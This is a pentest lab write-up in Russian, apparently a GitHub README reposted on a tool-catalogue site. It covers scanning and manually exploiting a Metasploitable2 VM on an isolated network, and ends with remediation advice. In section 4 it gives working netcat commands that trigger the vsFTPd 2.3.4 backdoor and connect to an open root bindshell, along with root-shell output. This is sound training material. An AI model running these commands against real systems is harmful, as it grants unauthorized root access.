Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/danreis20/pentest-lab-metasploitable2
РазведкаСканеры веб-уязвимостейКартирование сетиАнализ уязвимостейЭксплуатацияCTFТестирование на ПроникновениеСтатьи и ИсследованияОбучение и ОбразованиеЛаборатории и Практика
GitHubdanreis20/pentest-lab-metasploitable2

pentest-lab-metasploitable2

Лаборатория пентеста в изолированной сети: перечисление с помощью nmap/nikto и ручная эксплуатация Metasploitable2 (бэкдор vsFTPd CVE-2011-2523, bindshell) с полным техническим отчётом.

Репозиторий
319 ч 33 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Лаборатория пентеста в изолированной сети

Автор: Daniel Stefan de Jesus dos Reis Дата: Сентябрь/2026 Среда: Личная лаборатория KVM в изолированной виртуальной сети pentestlab

Уведомление о границах и разрешении

Это тестирование проводилось исключительно против собственной виртуальной машины, намеренно содержащей уязвимости, распространяемой Rapid7 специально для целей обучения наступательной безопасности, внутри изолированной виртуальной сети без выхода в интернет. Ни одна сторонняя система не была затронута. Этот проект имеет исключительно образовательную цель — развитие навыков в области тестирования на проникновение.

1. Архитектура лаборатории

  • Гипервизор: KVM/libvirt
  • Виртуальная сеть: pentestlab (мост virbr-lab), подсеть 192.168.100.0/24, без настроенного <forward> — то есть действительно изолированная сеть: виртуальные машины общаются между собой и с хостом, но не имеют маршрута за пределы лаборатории. XML сети в .
evidencias/pentestlab_network.xml
  • Хост атакующего: сама хост-машина с интерфейсом virbr-lab, использующая nmap, nikto, gobuster, hydra, sqlmap и netcat.
  • Цель: ВМ metasploitable2 (Metasploitable2, модифицированный Ubuntu 8.04), IP 192.168.100.90/24, назначенный через DHCP самой изолированной сети.
  • root@kitploit:~
    [ Host / Atacante ]  
            |
       virbr-lab (rede isolada, sem saída para internet)
            |
    [ metasploitable2 ] 
    

    2. Методология

    Я следовал базовому потоку: разведка → перечисление → эксплуатация → документирование:

    1. Обнаружение хоста и полное сканирование TCP-портов с определением служб/версий (nmap -sV -sC -p-)
    2. Сканирование веб-уязвимостей (nikto)
    3. Приоритизация известных уязвимостей (CVE), связанных с выявленными версиями
    4. Ручная эксплуатация, где все шаги ниже выполнялись с помощью nc, чтобы понять механизм каждой уязвимости, а не просто «запустить эксплойт»
    5. Документирование доказательств и рекомендаций по устранению

    3. Разведка — полное сканирование

    Команда: nmap -sV -sC -p- -T4 192.168.100.90 Полный вывод: evidencias/nmap_full_scan.txt

    Сводка наиболее значимых обнаруженных служб:

    ПортСлужбаВерсияПримечание
    21/tcpFTPvsftpd 2.3.4Разрешён анонимный вход + известный бэкдор
    22/tcpSSHOpenSSH 4.7p1Устаревшая версия
    23/tcpTelnetLinux telnetdПротокол с передачей в открытом виде
    25/tcpSMTPPostfix—
    80/tcpHTTPApache 2.2.8 + PHP 5.2.4phpMyAdmin и phpinfo.php доступны извне
    139/445/tcpSMBSamba 3.0.20-DebianПодписывание сообщений отключено
    1099/tcpJava RMIGNU Classpath grmiregistryИсторически уязвим к RCE
    1524/tcpbindshell—Уже открытый root-шелл без аутентификации
    3306/tcpMySQL5.0.51a-3ubuntu5—
    3632/tcpdistccdv1Исторически уязвим к RCE (CVE-2004-2687)
    5432/tcpPostgreSQL8.3.0–8.3.7—
    5900/tcpVNCпротокол 3.3—
    6667/6697/tcpIRCUnrealIRCd 3.2.8.1Версия, связанная с известным бэкдором
    8180/tcpHTTPApache Tomcat 5.5—

    4. Проэксплуатированные уязвимости (подтверждённые)

    4.1 Бэкдор в vsFTPd 2.3.4 — CVE-2011-2523 (Критическая)

    В период с 30/06/2011 по 03/07/2011 исходный код vsFTPd 2.3.4, доступный для скачивания, был изменён злоумышленником. Скомпрометированная версия содержит бэкдор: при получении в поле имени пользователя при FTP-логине строки, оканчивающейся на :), сервер открывает root-шелл на TCP-порту 6200 без какой-либо аутентификации.

    Выполненные шаги (полный лог в evidencias/vsftpd_backdoor_exploit.txt):

    root@kitploit:~
    # 1. Disparar a backdoor enviando USER terminado em ":)"
    ( printf 'USER test:)\r\n'; sleep 1; printf 'PASS test\r\n'; sleep 2 ) | nc -w 5 192.168.100.90 21
    
    # 2. Conectar na porta 6200, aberta pela backdoor
    ( printf 'whoami\n'; printf 'id\n'; printf 'uname -a\n'; sleep 2 ) | nc -w 5 192.168.100.90 6200
    

    Результат:

    root@kitploit:~
    uid=0(root) gid=0(root)
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
    

    Полный root-доступ получен без аутентификации.

    4.2 Открытый bindshell на порту 1524/tcp (Критическая)

    nmap уже идентифицирует эту службу как Metasploitable root shell — бэкдор, намеренно оставленный в образе (след от предыдущего эксплойта, обычное дело для тренировочных образов). Эксплуатация не требуется: достаточно подключиться.

    root@kitploit:~
    ( printf 'whoami\n'; printf 'id\n'; sleep 2 ) | nc -w 4 192.168.100.90 1524
    

    Результат: uid=0(root) gid=0(root) groups=0(root) — немедленный root.

    Полный лог в evidencias/bindshell_1524.txt.

    5. Выявленные уязвимости (не эксплуатировались в этом раунде)

    5.1 UnrealIRCd 3.2.8.1 — CVE-2010-2075 (Критическая, выявлена по версии)

    Версия UnrealIRCd, работающая на портах 6667/6697, соответствует сборке, исторически распространявшейся с бэкдором (команда AB; с последующей shell-командой). Я попытался запустить бэкдор вручную через nc, но сервер обработал ввод как недопустимую IRC-команду (451 :You have not registered) вместо выполнения команды — либо этот конкретный образ не содержит троянизированный бинарник, либо полезная нагрузка требует тонкой настройки, которой я не уделил приоритетного внимания в этом раунде. Фиксирую это как неудачную попытку, а не как подтверждённую уязвимость.

    5.2 distccd 3632/tcp — CVE-2004-2687 (Высокая)

    Служба распределённой компиляции, принимающая произвольные команды от любого подключающегося клиента без аутентификации. Выявлена по версии, не эксплуатировалась в этом раунде.

    5.3 Java RMI Registry — порт 1099/tcp (Высокая)

    Исторически уязвима к удалённому выполнению кода через десериализацию. Выявлена по версии, не эксплуатировалась в этом раунде.

    6. Веб-перечисление (nikto)

    Команда: nikto -h 192.168.100.90 -p 80 Полный вывод: evidencias/nikto_scan.txt

    Основные находки:

    • Apache 2.2.8 устарел (актуальной серией на тот момент была 2.2.22+)
    • Активен HTTP-метод TRACE (потенциальный XST)
    • /phpinfo.php открыто доступен извне (раскрывает конфигурацию PHP)
    • /phpMyAdmin/ доступен без ограничений по IP
    • Включён листинг каталогов в /doc/, /test/ и /icons/
    • Cookie phpMyAdmin устанавливается без флага httponly

    7. Рекомендации по устранению

    НаходкаРекомендация
    Бэкдор vsFTPd 2.3.4Никогда не использовать бинарники из неофициальных/непроверенных источников; проверять хеш/подпись пакетов перед установкой
    Bindshell на порту 1524Регулярно проводить аудит открытых портов (периодический внутренний nmap); любой недокументированный шелл — это инцидент
    distccd открыт без аутентификацииОграничить доверенными хостами через firewall или отключить, если распределённая сборка активно не используется
    phpMyAdmin/phpinfo.php открытыОграничить доступ по IP/VPN, никогда не выставлять административные инструменты публично
    Apache/PHP устарелиПоддерживать активный процесс управления патчами
    Включён листинг каталоговОтключить Options Indexes в Apache
    SMB с отключённым подписыванием сообщенийВключить server signing = mandatory

    8. Что эта лаборатория продемонстрировала на практике

    • Разведка и перечисление сети с помощью nmap (полное сканирование, определение служб/версий, NSE-скрипты)
    • Понимание механизма реального бэкдора (vsFTPd) и ручная эксплуатация через netcat без опоры на автоматизированный фреймворк
    • Анализ веб-уязвимостей с помощью nikto
    • Документирование теста на проникновение в формате отчёта: границы, методология, находки, приоритизированные по критичности, и рекомендации по устранению
    • Поддержание изолированной и безопасной лабораторной среды (виртуальная сеть без выхода в интернет)

    9. Следующие шаги

    • Повторить эксплуатацию UnrealIRCd с версией образа, подтверждённо содержащей троян, чтобы закрыть эту находку
    • Добавить вторую выделенную машину атакующего (например, Kali Linux) в сеть pentestlab вместо атаки напрямую с хоста
    • Расширить эту лабораторию до сценария Active Directory (проект запланирован отдельно)
    Скачать инструмент